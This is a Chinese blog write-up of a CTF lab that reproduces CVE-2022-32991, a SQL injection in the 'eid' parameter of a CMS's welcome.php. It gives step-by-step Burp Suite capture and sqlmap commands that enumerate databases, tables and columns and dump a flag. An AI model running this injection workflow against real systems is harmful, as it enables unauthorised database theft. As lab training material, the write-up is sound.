CVE-2022-32991靶场复现

靶场环境:
image.png

题目提示了该CMS的welcome.php中存在SQL注入攻击。

CVE官方给出的提示:
image.png

welcome.php页面存在SQL注入,并且这个参数是eid

打开靶场环境:
image.png

页面是一个登陆注册的界面

用户注册:
image.png

1
01@0.com
123456
123456
点击Register(注册)
注册成功

用户登录:
image.png

01@0.com
123456
点击Login(登录)

登陆成功:
image.png

箭头所指方向存在welcome.php文件但是参数不是eid,而是p
下方有Start开始按钮,点点试试,看看有没有新的发现

image.png
image.png

存在了eid参数
由于没有注入窗口,所以想到了,火狐+burpsuite+sqlmap组合拷打

复制带有eid参数的页面网址,用火狐浏览器打开,进行burpsuite抓包
image.png
image.png
创建一个txt文件,将数据包复制到这个txt文件里面
image.pngimage.png
注入前的准备工作,了解sqlmap的部分参数

  1. -r 加载文件中的HTTP请求(本地保存的请求包txt文件)
  2. -D 选择使用哪个数据库
  3. -T 选择使用哪个表
  4. -C 选择使用哪个列
  5. –dbs 列出所有的数据库
  6. –batch 自动选择yes
  7. –tables 列出当前的表
  8. –columns 列出当前的列
  9. –dump 获取字段中的数据

启动sqlmap加载flag.txt文件HTTP请求并列出其所有数据库
进入到桌面目录下(注意这是我的flag.txt文件保存的位置)
执行如下命令:
sqlmap -r flag.txt --dbs --batch
回显如下:
image.png
可以看到存在数据库ctf(注意执行命令后,加载可能会慢点,不必慌张。)
接下来列出数据库ctf里面的所有数据表
执行如下命令:
sqlmap -r flag.txt -D ctf --tables --batch
回显如下:
image.png
image.png
可以看到数据库ctf里面存在数据表flag,猜测数据表flag里面存在flag(严谨一点)
接着爆数据表flag里面的字段
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag --columns --batch
回显如下:
image.png
数据表flag里面存在字段flag
最后爆flag字段里面的内容
执行如下命令:
sqlmap -r flag.txt -D ctf -T flag -C flag --dump --batch
回显如下:
image.png
得出flag:
flag{cdadbe80-6b13-4ce7-bd86-3ff050dd36d3}

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值